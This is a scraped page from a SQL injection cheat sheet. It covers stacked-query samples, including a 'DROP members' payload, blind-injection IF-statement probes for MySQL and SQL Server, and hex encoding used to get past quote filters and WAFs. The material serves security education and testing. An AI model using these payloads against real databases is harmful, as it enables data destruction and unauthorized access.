Sql Injection Cheat Sheet Page 4
ADVERTISEMENT
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18not possible to execute second query in PHP-MySQL applications or maybe MySQL
client supports this, not quite sure. Can someone clarify?
Stacked SQL Injection Attack Samples
•
ID:
10;DROP members --
•
SELECT * FROM products WHERE id = 10; DROP members--
This will run DROP members SQL sentence after normal SQL Query.
If Statements
Get response based on a if statement. This is one of the key points of Blind SQL
Injection, also can be very useful to test simple stuff blindly and accurately.
MySQL If Statement
•
(M)
IF(condition,true-part,false-part)
SELECT IF(1=1,'true','false')
SQL Server If Statement
•
(S)
IF condition true-part ELSE false-part
IF (1=1) SELECT 'true' ELSE SELECT 'false'
If Statement SQL Injection Attack Samples
if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else
(S)
select 1/0
This will throw an divide by zero error if current logged user is not "sa" or "dbo".
Using Integers
Very useful for bypassing, magic_quotes() and similar filters, or even WAFs.
•
(SM)
0xHEXNUMBER
You can write hex like these;
(S)
SELECT CHAR(0x66)
(this is not an integer it will be a string from Hex) (M)
SELECT 0x5045
(this is integer now!) (M)
SELECT 0x50 + 0x45
String Operations
String related operations. These can be quite useful to build up injections which are not
using any quotes, bypass any other black listing or determine back end database.
String Concatenation
ADVERTISEMENT
0 votes
Related Articles
Related forms
Related Categories
Parent category: Education